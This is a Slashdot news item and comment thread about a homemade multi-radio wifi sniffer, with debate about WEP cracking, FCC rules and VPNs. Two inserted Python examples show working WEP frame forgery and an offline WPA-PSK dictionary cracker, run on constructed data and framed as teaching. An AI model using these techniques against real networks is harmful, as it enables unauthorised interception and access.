Hacker-Built PC Scans 300 Wifi Networks At Once
An anonymous reader writes to mention an Engadget post on an incredibly powerful wifi scanner. The 'Janus Project', as it is called, can sniff 300 networks simultaneously. It stores and encrypts the data as it receives it, for later use. From the article: "In addition, the Janus Project has an instant off switch, which requires a USB key that has a 2000-bit passkey and a separate password to regain access. What's under the hood? Williams packed an Ubuntu Linux machine running on a 1.5GHz VIA C7 processor with an Acer 17-inch screen into that snazzy little rugged yellow box. Oh, and the closed case is waterproof too, in case you need to transport Janus Project on a whitewater raft to your next hacking hotspot. We don't doubt someone will." The post leads to a tgdaily article, which offers more details.
Just another way to get thrown into Gitmo. (Score:3, Funny)
Re: (Score:2, Informative)
After the Instant Off switch is hit, a USB key with a 2000-bit passkey and a manually entered password are needed to access the computer. Williams said that even if someone managed to grab the USB key, they would still have to "torture or bribe me" to get the password.
In the UK, the RIP act allows you to be thrown in jail for 3 years for not supplying the encryption keys, in America I can quite easily picture this guy wearing his leather hat and some fetching oran
Re: (Score:1)
Re: (Score:3, Interesting)
Your three choices are:
1) answer the questions/comply with information requests - which ends up incriminating you
2) refuse to answer the questions - now you can be charged with interfering
Re: (Score:2)
Of course, be ready to face the full force of the authorities' revenge for daring to stand up to them when they do something wrong.
Re: (Score:2)
Law-enforcement isn't your only adversary. It's just a good one to model because it's an adversary with lots of resources at its disposal, and not necessarily completely trustworthy.
No information technology is going to give you significant protection from the courts except in very limited circumstances.
Just about time (Score:2)
Re: (Score:2)
Re: (Score:2)
I don't think that this machine can scan, decrypt, and record 300 WiFi Networks in real-time.
Re:Just about time (Score:5, Interesting)
No, it can't decrypt traffic from 300 networks at once, but it can certainly crack one that's encrypted with some of the most common algorithms rather quickly. It's more than just a recording device. Although, if it really can crack networks that quickly, then conceivably you could crack all the WEP-enabled networks in range, and then start logging all the traffic on all the networks that you could hear, encrypted and not, for later analysis.
Re: (Score:2)
Oh come on... That just makes him sound like a nutcase.
Re: (Score:1)
Re: (Score:1)
Re: (Score:2, Informative)
Re: (Score:2)
Oh, nifty! I guess it replays recorded (encrypted) frames, hoping to capture the replies (even if they're just NAKs) in order to use them to get the IVs needed to crack the WEP key.
Yet another reason why encryption without authentication (or doing something with messages that have failed authentication besides dropping them to the floor) is a bad idea.
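The point the comment above makes, worked through in code: an added example (mine, not the commenter's and not Janus Project code) that implements WEP's RC4 + CRC-32 construction and shows two consequences of encrypting without authentication. Because RC4 is a stream cipher and CRC-32 is affine, a captured frame can be retargeted without the key and the receiver's ICV check still passes; and two frames under the same IV leak the XOR of their plaintexts. The key, IV and frame payload are constructed for the demo, and the frame format omits the key-ID byte.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); WEP keys the cipher with IV || secret key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32_le(data: bytes) -> bytes:
    """WEP's ICV: CRC-32 of the plaintext, little-endian.  No key involved."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key, plaintext || ICV).  Key-ID byte omitted."""
    return iv + rc4(iv + key, plaintext + crc32_le(plaintext))


def wep_decrypt(key: bytes, frame: bytes):
    """Returns the plaintext if the ICV verifies, else None (frame dropped)."""
    iv, body = frame[:3], frame[3:]
    pt = rc4(iv + key, body)
    data, icv = pt[:-4], pt[-4:]
    return data if icv == crc32_le(data) else None


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def flip_bits_without_key(frame: bytes, delta: bytes) -> bytes:
    """Modify a captured WEP frame so the receiver decrypts plaintext XOR delta
    and the ICV still verifies.  Needs no key: XORing the ciphertext XORs the
    plaintext under a stream cipher, and CRC-32 is affine, so
    crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of len(d))."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    if len(delta) != n:
        raise ValueError("delta must cover the whole plaintext")
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(n))
    new_body = xor_bytes(body[:n], delta) + xor_bytes(
        body[n:], struct.pack("<I", icv_delta & 0xFFFFFFFF))
    return iv + new_body


def leaked_plaintext_xor(frame_a: bytes, frame_b: bytes) -> bytes:
    """Two frames under the same IV share a keystream: XOR of the ciphertexts
    is the XOR of the (plaintext || ICV) pairs, again with no key needed."""
    if frame_a[:3] != frame_b[:3]:
        raise ValueError("IVs differ; keystreams are not shared")
    return xor_bytes(frame_a[3:], frame_b[3:])


# Constructed demo data (not from any real capture): a 40-bit key, a fixed IV
# and a payload carrying an address-like field an attacker would want to redirect.
KEY = bytes.fromhex("0102030405")
IV = bytes.fromhex("aabbcc")
PLAINTEXT = b"DST=10.0.0.5 PAYLOAD=hello"


def demo_redirect() -> bytes:
    """Retarget the captured frame from 10.0.0.5 to 10.0.0.9 without the key."""
    frame = wep_encrypt(KEY, IV, PLAINTEXT)
    pos = PLAINTEXT.index(b"5")              # the '5' in 10.0.0.5
    delta = bytearray(len(PLAINTEXT))
    delta[pos] = ord("5") ^ ord("9")
    forged = flip_bits_without_key(frame, bytes(delta))
    return wep_decrypt(KEY, forged)          # receiver accepts it: ICV is valid


if __name__ == "__main__":
    print(demo_redirect())
```

A MAC keyed under a secret (or an AEAD mode, as WPA2's CCMP uses) closes both holes: the forger cannot produce a valid tag for the altered bytes, and a receiver that drops unauthenticated frames gives the attacker nothing to work with.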
Re: (Score:2)
Re: (Score:2)
Already a common feature (Score:5, Funny)
I use a hammer, you use an instant-off switch that you'll never be able to turn back on. At the end of the day, at least one of us will have released some pent-up frustration and anger.
What kind of hammer? (Score:3, Funny)
(OMG - and you thought Geek sites were bad - "hammernet". Sheesh!)
Re: (Score:3, Funny)
Re: (Score:1)
This device is against FCC Part 15 rules (Score:5, Interesting)
I know everyone on
to hack some schmuck's WEP key.
Re:This device is against FCC Part 15 rules (Score:5, Insightful)
-b
Re: (Score:2)
Re:This device is against FCC Part 15 rules (Score:5, Insightful)
The FCC regulating whether or not i can say FUCK on the radio, I don't.
Re: (Score:1)
Re:This device is against FCC Part 15 rules (Score:4, Insightful)
"I like the way the rules help me in one way, I don't like the way the rules constrain me in another way."
At some point, the organism understands that society - the collective "we" that live together - cannot exist without compromise, and the essence of compromise is empathy.
Perhaps you might consider that some of us would prefer that you pollute your own yard, not the collective commons that is the public airwaves.
Re: (Score:2)
Maybe his particular statement, but I will come to his defense.
Well in one instance the rules are forcing devices to not interfere with each other, a fairly useful form of government regulation. In the other case the regulation puts a constraint on the First Amendment ("Congress shall make no law [...] abridging the freedom of speech"), an illegal
Re: (Score:2)
What?! (Score:2)
Go back to church and don't hurt yourself by attempting to think. Leave that to us science and nerd types, please.
rhY
Re: (Score:2)
Let's go back to the topic, perhaps?
So you claim that the right to say "FUCK" is established in the Bill of Rights. So by your logic, I can say FUCK wherever I want? Oh wait, no, I can't. Dozens of court cases (many going all the way to the Supreme
Re: (Score:2)
The one watt amplifiers mentioned in the article almost guarantees that this device is operating outside the FCC part 15 rules.
False.
802.11 is considered to be direct sequence spread-spectrum. According to 47 CFR 15.247(b)(3), the limit is 1W for this purpose.
Re: (Score:1)
Re: (Score:2)
I'm not denying that 1 Watt amplifiers are totally legal, but doesn't that imply that the antenna is going to be low-gain in order to meet the field strength limits?
As a DSSS system, 802.11 is regulated on a power/gain rather than field strength basis. You can have up to a 6dB antenna gain before you have to start peeling back your transmitter power to comply.
From there, if you have a point-to-multipoint system (which is what this box would be), you need to drop back dB-for-dB for every dB over 6. F
Re: (Score:1)
Sell? (Score:3, Interesting)
I'm sorry, but I don't see much in the way of commercial application for this thing - we know standard wireless networking encryption isn't secure. We know it can be cracked, and it can be cracked with just 2 cheap laptops to capture the data. There isn't much more of a need for proof-of-concept anymore.
Re: (Score:2)
Re: (Score:1)
And I would pay for his hat.
Re: (Score:2)
Oh, not so sure about the military, but you know the FBI / NSA / CIA have them - BUT I bet they are not cheaper. EVERYTHING the government does costs more. After all, it's not like the guys buying shit are using their own money now... Network General has been making network sniffers for years, but their $20K boxes really don't do much more than a cheap laptop running ethereal (wireshark) and other misc open source tools.
Re: (Score:1)
*ducks
WEP is going to be ... (Score:1)
Why? Because of WEP's broadcasting nature, smart people make things like the Janus Project, capture your data and may break WEP security.
This was known to cryptanalysts long before, so it is superseded by the WPA (Wi-Fi Protected Access) and WPA2 standards.
But yes, WEP is still used to avoid casual snooping :).
:o\ (Score:5, Insightful)
I imagine that'd be a bit more productive.
I wish them good luck! (Score:5, Funny)
Re: (Score:2, Funny)
move.l <key>,d0
That was easy.
I'm not sure it's possible in x86 processors though.
How...? (Score:1)
Re: (Score:2)
But considering how mangled that sentence is, theoretically, I'd wait for a claim directly from the source before claiming crackpot.
Also in the next version (Score:3, Funny)
Re:Also in the next version (Score:5, Funny)
The Easter Bunny would just melt into a chocolatey mess.
Why? (Score:1)
He can already crack WEP in under five minutes, I could see where he could possibly crack WEP in a single "for" loop or something using recursion (in which case why would it need to loop? Maybe if something goes wrong, the router doesn't respond or something).
And then SHA1 and RSA encryption would be his next target, and eventually he'd get it to where he can crack that in a single "for" loop.
Re: (Score:2)
Re: (Score:1)
1. Read. 2. Write reply. 3. Re-read. 4. Post.
Re: (Score:1)
5. ???
6. Profit!
Re: (Score:1)
Re: (Score:2)
Usually, but not in VHDL.
Re: (Score:3, Informative)
Re: (Score:2)
RISC is so passe nowadays.
So use VPNs. (Score:5, Interesting)
Obviously not foolproof. I need to get all the machines to drop the traffic unless it's routed through the router. In other words, it doesn't matter where it comes from, but the machines will only listen to traffic coming in off the VPN subnet, and then only listen to that if it's being routed by the internal router. That keeps someone from being cute somehow and confusing the network by plugging something in with an IP address that's on the VPN subnet; since it wouldn't come via the internal router (VPN server), the machines would go "Uh, WTF?"
Re: (Score:2)
You'd think by now that people would go ahead and use WEP or WPA, but tunnel traffic over a VPN even to internal sites. That's what I do. While someone may be able to crack my WEP or WPA keys, all that gets them is the ability to access the VPN port on the router.
That is because you truly take wireless security seriously, whereas 97% of the people do not. This is the ONLY proven way to secure wireless short of unplugging it. In such cases like this, all a hacker could do is DoS you, which is minor.
Re: (Score:2)
Silly me! I thought one-time pads were the only proven way to secure a wireless network. :P
Re: (Score:3, Informative)
I don't even bother with WEP/WPA (Score:2)
Some corrections (Score:5, Informative)
The disk encryption keys are stored on USB and decrypted via passphrase (key encryption key) using a custom init process that mounts the encrypted loop-aes disk(s) and does the pivot_root / exec init into the target. This gives you full disk encryption booting from a trusted read-only kernel+initrd iso image. (or hdd bootloader)
The "instant off" is the key zeroisation mechanism where loop-aes keys (rotated in memory) are flushed and the disks are now inaccessible. A reboot and passphrase auth with USB key device present is then required to get back to a working state.
The use of 8 radios means most of them are in monitor mode attached to different antennas. There are two amplified cards (1W teletronics in line) which can be used for injection / active attacks, but 2 transmitting radios is about the limit practically speaking due to 802.11MAC / CSCA.
The WPA/WPA2 cracking references WPA-PSK dictionary attacks / cowpatty speedup via the Padlock hash engine SHA1 instruction. This gives you about a 10-20x increase in dictionary attack throughput but is still slow compared to most attacks. Many other kernel functions (loop-aes, IPsec, entropy in
[The "breaking SHA1 and RSA encryption in a single processor instruction cycle" line appears to confuse the implementation of these primitives (SHA1/MontMult) in a single instruction. These are not cracked by a single instruction.]
The comment about government sales is likely due to the fact that this system is well over FCC EIRP limits, thus restricting commercial sales to military or emergency services.
Additional images here:
http://s103.photobucket.com/albums/m127/coderman4
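The WPA-PSK dictionary attack the post refers to, as an added example in Python (mine, not coderman's code and not cowpatty): the expensive step per candidate is PBKDF2-HMAC-SHA1 with 4096 iterations to derive the PMK, which is exactly the SHA-1 work a hardware hash engine accelerates; the rest is one PRF expansion and one HMAC over the captured EAPOL frame. The SSID, MAC addresses, nonces and EAPOL-Key message 2 bytes below are constructed for the demo (the frame layout is schematic, not byte-exact), and the attack is verified against a handshake built from a known passphrase.

```python
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    Two output blocks, so 8192 HMAC-SHA1 calls per candidate; this is the cost
    that dominates a dictionary attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def kck_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF(PMK, "Pairwise key expansion", min/max of MACs and nonces).
    Its first 16 bytes are the KCK, the key that MICs the EAPOL frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, ccmp: bool = True) -> bytes:
    """EAPOL-Key MIC over the frame with its MIC field zeroed:
    HMAC-SHA1 truncated to 128 bits for CCMP (WPA2), HMAC-MD5 for TKIP (WPA)."""
    if ccmp:
        return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]
    return hmac.new(kck, eapol_mic_zeroed, hashlib.md5).digest()


def build_sample_handshake(passphrase: str, ssid: str = "JanusTest") -> dict:
    """Constructed handshake material (not a real capture): what a sniffer
    would pull from message 2, plus the MIC a station using this passphrase
    would have produced.  MACs and nonces are fixed demo values."""
    aa = bytes.fromhex("001122334455")       # authenticator (AP) address
    spa = bytes.fromhex("66778899aabb")      # supplicant (station) address
    anonce = hashlib.sha256(b"demo-anonce").digest()
    snonce = hashlib.sha256(b"demo-snonce").digest()
    # Schematic EAPOL-Key frame: 802.1X header, descriptor type/info/length,
    # replay counter, SNonce, IV, RSC, ID, zeroed MIC, key data length, RSN IE.
    eapol = (b"\x01\x03\x00\x75" + b"\x02\x01\x0a\x00\x10" + bytes(8) + snonce
             + bytes(16) + bytes(8) + bytes(8) + bytes(16) + b"\x00\x16"
             + b"\x30\x14" + bytes(20))
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    return {"ssid": ssid, "aa": aa, "spa": spa, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack_psk(hs: dict, wordlist) -> "str | None":
    """Offline dictionary attack against one captured 4-way handshake.
    Returns the passphrase that reproduces the MIC, or None."""
    for word in wordlist:
        if not 8 <= len(word) <= 63:
            continue                         # not a valid WPA passphrase, skip it
        pmk = pmk_from_passphrase(word, hs["ssid"])
        kck = kck_from_pmk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return word
    return None


if __name__ == "__main__":
    hs = build_sample_handshake("correct horse battery")
    print(crack_psk(hs, ["password", "letmein", "correct horse battery"]))
```

Because the salt is the SSID, the PMK computation can be precomputed per SSID (the rainbow-table approach for common SSIDs) but not shared across networks with distinct names; a long random passphrase, or a unique SSID plus a long passphrase, is what puts the per-candidate cost out of reach regardless of how fast the SHA-1 engine is.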
Re: (Score:1)
Re: (Score:2)
guess again...
Why modded overrated? (Score:3, Insightful)
I don't see how that post could be modded overrated. If I get modded troll and otherwise ignored...
Re:Why the confusion? (Score:2)
or perhaps this is all an elaborate ruse designed to make you think in that direction...
Re: (Score:2)
Accidental sterilization due to prolonged RF absorption is a serious problem. Also, a bottle of excedrin helps keep the microwave headaches at bay...
[but seriously, use a properly keyed VPN over wireless and you're in good shape against any attacker.]
Article Summary (Score:1, Insightful)
I already did this (Score:1)
Snazzy little yellow box? (Score:3, Informative)
Re: (Score:1)
You must be some kind of terrorist with all these snazzy little yellow boxes.
Re: (Score:2)
Simpler version scans almost as many (Score:2, Insightful)
Re: (Score:1)
283 * 0 = 0 (Score:4, Interesting)
Re: (Score:2)
Re: (Score:3, Informative)
1, 6, 11.
Any other channels are just varying degrees of overlap with these 3.
Re: (Score:2)
Maybe if you're between 2 APs separated by more than their transmit radius, but less than double it, you'll get both "sharing" a single channel, because they each can't sense the other to switch. But that'll make your own node unable to arb
Re: (Score:2)
Original Post (Score:1, Redundant)
Re: (Score:1, Redundant)
Re:love the picture in the tgdaily article (Score:5, Funny)
I've told you before, we don't want to hear about the herpes clinic.
300 networks? (Score:2)
K9 version (Score:1)
Start your engines. (Score:1)
Interesting (Score:2)
I employ two of three possible methods to secure my network, MAC filters and WPA keys. So I was thinking, how does this deal with MAC filters. Then it came to me that the first two octets of the MAC are easy - Intel has a pretty big lock on wireless, as does Broadcom. So that's 65,535 fewer combinations to look for. But where it gets interesting is in the last four octets. That leaves 4,294,967,296 possible combinations. Not that you couldn't brute
Re: (Score:2)
Referencing Judge Dredd is not funny (Score:2)
Re: (Score:2)
Re: (Score:2)
When they trace the VoIP calls back to your network, just tell the cops; "Um, yeah, I saw those guys leave, just as I as pulling up. They were using my secured network without my permission, then they entered my secure house and took my snacks from my child-proof cabinet. Then drove off in my locked car, carrying my secured weapons safe..."
Just add network access to the list of "secured" items that can be taken.
Re: (Score:1)
There you have it. Even a less-savvy judge will be convinced that it is possible and feasible, if there are tools like that mainstream.